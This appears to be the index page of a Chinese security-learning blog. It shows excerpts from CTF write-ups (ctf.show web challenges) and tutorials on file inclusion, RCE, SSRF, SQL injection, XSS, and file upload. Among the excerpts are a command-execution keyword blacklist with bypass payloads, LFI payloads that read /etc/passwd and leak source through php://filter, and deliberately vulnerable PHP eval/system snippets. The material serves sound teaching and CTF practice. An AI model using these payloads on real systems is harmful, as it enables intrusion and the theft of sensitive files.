命令执行Web5112345678910<?phpif(isset($_GET['c'])){ $c=$_GET['c']; if(!preg_match("/\;|cat|flag| |[0-9]|\\$|\*|more|less|head|sort|tail|sed|cut|tac|awk|strings|od|curl|\`|\%|\x09|\x26/i", $c)){ system($c." >/dev/null 2>&1"); }}else{ highlight_file(__FILE__);}
过滤增加tac
1234?c=nl<fl''ag.php||?c=vi<fla\g.php||?c=ta''c<fla\g.php||?c=mor%27%27e<fla%27%27g.php||
Web521234 ...
Web1F12 或者查看源码即可
Web2F12无法查看源代码 这里使用
1view-source:url
Web3抓包重发
Web4工具dirsearch
访问/robots.txt后访问/flagishere.txt即可
Web5index.phps泄露
index.phps
访问自动下载,在记事本中打开得到flag
Web6扫目录得到www.zip
12345678910111213root@aura:~/Tool/dirsearch-master# python3 dirsearch.py -u https://c2bf6e3c-cc17-4b7a-83e0-97e6d12a8acb.challenge.ctf.show/ _|. _ _ _ _ _ _|_ v0.4.3 (_||| _) (/_(_|| (_| )Extensions: php, asp, aspx, jsp, html, htm | HTTP method: GET | Threads: 25 | Wordlist size: 12290Target: ...
文件包含及伪协议漏洞利用利用条件
动态文件包含:通过 include() 等函数动态引入文件,且参数为动态变量。
用户可控:用户能够控制该动态变量的值。
利用方法
读取敏感文件
示例:
1?arg=/etc/passwd
利用封装协议读取源码
示例:
1?arg=php://filter/read=convert.base64-encode/resource=config.php
说明:通过 php://filter 封装协议能看到 PHP 文件的源码。
包含图片 Getshell
说明:在上传的图片中嵌入恶意代码,然后利用 LFI 包含该图片,即可执行图片内的 PHP 代码。
截断包含
漏洞代码示例:
12345678<?phpif(isset($_GET['arg'])){ include($_GET['arg'].".php"); } else { include(index.php);}?>
说明:这种做法在一定程度上修复了漏洞。例如,上传图 ...
什么是 RCE一、RCE 概述RCE,全称 Remote Code Execution,即远程代码执行,是一种极其危险的安全漏洞。正常情况下,用户只能按照开发者设定的功能使用网站或应用程序。但如果存在 RCE 漏洞,攻击者便可突破限制,在目标服务器上执行自定义代码,进而控制系统。
二、命令执行与代码执行RCE 漏洞通常表现为两种形式:
代码执行:能够执行编程语言代码(如 PHP、Python、Java)。
命令执行:能够执行操作系统命令。
两者可以相互利用。例如,通过代码执行获取命令执行权限,或利用命令执行来执行代码。
示例对比代码执行漏洞(PHP 示例)123<?php$code = $_GET['c'];eval($code);
命令执行漏洞(PHP 示例)123<?php$cmd = $_GET['c'];system($cmd);
攻击者可以通过精心构造参数 c,传入恶意代码或命令,造成漏洞利用。
三、常见的代码/命令执行函数3.1 PHP代码执行函数:
eval()
assert()
preg_repla ...
Notes
未读SSRF&Gopher 协议
[!WARNING]
本文详细介绍了通过 URL 地址实现的多种功能及其可能引发 SSRF(服务器端请求伪造)漏洞的场景、利用方法、常见函数、伪协议、绕过方式以及防御措施。请务必注意,本文内容仅供技术研究和学习之用,禁止用于任何非法用途。
什么是SSRFSSRF(Server-Side Request Forgery:服务器端请求伪造) 是一种由攻击者构造形成由服务端发起请求的一个安全漏洞。
一般情况下,SSRF攻击的目标是从外网无法访问的内部系统。(正是因为它是由服务端发起的,所以它能够请求到与它相连而与外网隔离的内部系统)
SSRF漏洞原理SSRF 形成的原因大都是由于服务端提供了从其他服务器应用获取数据的功能且没有对目标地址做过滤与限制。
比如,黑客操作服务端从指定URL地址获取网页文本内容,加载指定地址的图片,下载等等。利用的是服务端的请求伪造。ssrf是利用存在缺陷的web应用作为代理攻击远程和本地的服务器
常见功能场景分享功能通过 URL 地址分享网页内容。
转码服务通过 URL 地址将原地址的网页内容调优,使其适合手机屏幕浏览。由 ...
SQL注入数据库种类与架构对比分析一、Access 数据库架构解析1. 用户管理特性
无独立用户体系:采用文件系统权限管理
全库共享访问:通过文件共享密码保护(脆弱性高)
典型应用场景:单机小型应用/历史遗留系统
12345graph TDA[Access数据库文件.mdb/.accdb] --> B[表集合]A --> C[查询对象]A --> D[窗体对象]A --> E[宏代码]
2. 安全缺陷分析
无细粒度权限控制
连接字符串存储密码(Base64可逆)
最大支持2GB数据量(Access 2016+)
3. 数据存储示例1234567D:/data/├── company.accdb│ ├── 员工表│ │ ├── 工号 (文本)│ │ ├── 姓名 (文本)│ ├── 部门表│ │ ├── 部门ID (自动编号)
二、MySQL 数据库架构解析1. 管理模式
用户模式:
12345678910111213141516171819202122graph TD subgraph 统一管理模式 ...
Notes
未读XSS跨站攻击&CSRF
[!NOTE]
本文档综合整理了两篇关于 XSS(跨站脚本攻击)的笔记内容,从基本原理、各类漏洞类型、攻击利用流程到防御措施,涵盖了反射型、存储型、DOM 型及其他拓展类型的 XSS 攻击技术。本文档仅用于技术交流、研究与学习目的,旨在帮助网络安全人员理解和掌握相关安全知识和防御技巧。文中涉及的示例、技术和工具均为理论探讨,禁止用于任何非法或未经授权的攻击活动。使用者应严格遵守所在国家和地区的法律法规,对因不当使用本文信息所导致的任何后果,作者不承担任何法律责任。
XSS1. XSS 漏洞原理1.1 跨站原理
当应用程序发送给浏览器的页面中包含用户提交的数据,但没有经过适当验证或转义时,就会导致跨站脚本漏洞。
这个“跨”实际上属于浏览器的特性,而不是缺陷。
浏览器同源策略:只有发布 Cookie 的网站才能读取 Cookie,若存在漏洞,可能会造成 Cookie 窃取、劫持用户 Web 行为,甚至结合 CSRF 进行针对性攻击。
2. XSS 基础类型2.1 反射型 XSS原理及攻击流程
构造恶意链接 攻击者构造一个包含恶意脚本的 URL,例如 ...
文件上传漏洞文件上传漏洞原理一些 web 应用程序中允许上传图片、视频、头像和许多其他类型的文件到服务器中。 文件上传漏洞就是利用服务端代码对文件上传路径变量过滤不严格,将可执行的文件上传到服务器中,再通过 URL 去访问以执行恶意代码。
危害非法用户可以利用上传的恶意脚本文件控制整个网站,甚至控制服务器。 这个恶意的脚本文件,又被称为 WebShell,也可以将 WebShell 脚本称为一种网页后门,WebShell 脚本具有非常强大的功能,比如查看服务器目录、服务器中的文件,执行系统命令等。
防御
文件扩展名服务端白名单效验
文件内容服务端效验
上传文件重命名
隐藏上传文件路径
限制相关目录的执行权限,防范 WebShell 攻击
检测与绕过无验证直接上传一句话木马或者 WebShell 脚本即可。
客户端检测(Javascript 检测)在网页上写一段 Javascript 脚本,效验文件上传的后缀名,有白名单形式也有黑名单形式。如果上传文件的后缀不被允许,则会弹窗告知,此时文件上传的数据包并没有发送到服务端,只是在客户端浏览器使用 Javascript 对数据包进行 ...
基础入门目录
基础架构与知识点
Web 应用架构
APP 和小程序架构
渗透测试与常规命令
文件上传/下载
反弹 Shell
抓包技术与工具
HTTP/S 抓包
全局协议抓包
数据传输与加密算法
存储密码、传输加密与数据格式
常见编码与加密算法
附录:PHP 7.3 加密示例
其它知识点
混淆与逆向保护
常见安全产品与防护技术
常见问题与测试要点 🤔
基础架构与知识点知识点分类 📝Web 相关
常规: 系统、中间件、数据库、源码等
其他: 前后端、软件、Docker、分配站等
拓展: CDN、WAF、OSS、反向代理、负载均衡
APP 架构
封装平台、原生态开发、H5、Flutter 等
小程序架构
基于 Web、H5、JS、Vue 框架等
渗透命令
常规命令、文件上传/下载、反弹 Shell(正向/反向)、数据回显
抓包技术
HTTP/S 级别: 针对 Web、APP、小程序、PC 应用等
全局协议抓包: 针对 APP、小程序、PC 应用,涉及 TCP/UDP/ICMP& ...
什么是CTF?CTF(Capture The Flag)中文一般译作夺旗赛,在网络安全领域中指的是网络安全技术人员之间进行技术竞技的一种比赛形式。CTF起源于1996年DEFCON全球黑客大会,以代替之前黑客们通过互相发起真实攻击进行技术比拼的方式。已经成为全球范围网络安全圈流行的竞赛形式,2013年全球举办了超过五十场国际性CTF赛事。而DEFCON作为CTF赛制的发源地,DEFCON CTF也成为了全球最高技术水平和影响力的CTF竞赛,类似于CTF赛场中的“世界杯” 。
部署篇 CTFd
CTFd 是一个 Capture The Flag 框架,专注于易用性和可定制性。它配备了运行 CTF 所需的一切,并且很容易使用 plugins 和主题进行自定义。
GZ::CTF
项目地址:https://github.com/GZTimeWalker/GZCTFGZ::CTF 是一个基于 ASP.NET Core 的开源 CTF 平台,采用 Docker 或 K8s 作为容器部署后端,提供了可自定义的题目类型、动态容器和动态分值功能。
为什么选择GZ::CTF对于我个人而言来说,拉取Doc ...